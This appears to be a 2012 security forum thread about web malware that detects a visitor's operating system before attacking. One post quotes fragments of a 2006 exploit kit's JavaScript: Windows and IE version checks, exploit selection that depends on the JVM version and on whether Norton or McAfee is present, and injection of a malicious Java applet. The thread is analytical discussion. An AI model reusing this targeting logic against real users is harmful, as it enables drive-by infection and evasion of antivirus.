Web-based malware determines your OS, then strikes

Discussion in 'malware problems & news' started by Thankful, Jul 11, 2012.

Thread Status:
Not open for further replies.
  1. Thankful

    Thankful Savings Monitor

    Joined:
    Feb 28, 2005
    Posts:
    3,737
    Location:
    New York City
  2. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    Java... where are you? :D
     
  3. I just want to see a Java-based remote access trojan try to hide itself. Kind of like a rhinoceros trying to hide in your front yard.

    LOL. "Buy it! Buy it or the malware will get you!" Lovely hype there from Sophos, and lovely of the columnist to just swallow it up.
     
  4. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    More than six years ago, a similar trick determined the version of Windows and IE, and then served up the appropriate exploit.

    Here is some of the code from an exploit in February, 2006:

    Code:
    // launching exploit which number is depends on Windows and IE versions
    function Get_Win_Version(IE_vers)
       
         if (IE_vers.indexOf('Windows 95') != -1) return "95"
         else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
         else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
         else if (IE_vers.indexOf('Windows 98') != -1) return "98"
         else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
         else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
         else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3" 
    For Example, if the user was running Win2K and IE, three exploits were possible:

    Code:
     case "2K":
       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
      {  [B]ExploitNumber=1[/B];  }    
               else     // if JVM = 5.0.3810.0 or higher
                
      if ((fNortonAV==0)&&(fMcAfee==0))
     { [B]ExploitNumber=3[/B]; } 
         else
         { [B]ExploitNumber=2[/B]; } 
    If Exploit (Case) 1 was found to be appropriate, it launched a Java exploit:


    Code:
    case  1:
          Trojan_Path=Trojan_Path+"MS03-11";
          ObjectContainer.innerHTML= [B]applet archive[/B]="'+InetPath+'/'+'[B]ie0601a.jar[/B]" 
    And so it goes...


    ----
    rich
     
  5. Determining which version of WIndows is used (or which browser) is common enough that I've personally encountered it ITW. Last time IIRC was with a fake antivirus site, which installed different versions depending on whether you were using IE 6, 7, or 8.
     
  6. xxJackxx

    xxJackxx Registered Member

    Joined:
    Oct 23, 2008
    Posts:
    4,050
    Location:
    USA
    Not on any of my machines. :)
     
  7. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    Pretty cool except:

    1) I don't have Java installed

    2) If I were to install Java it would be sandboxed in a heartbeat

    It also uses the SET
     
Loading...
Thread Status:
Not open for further replies.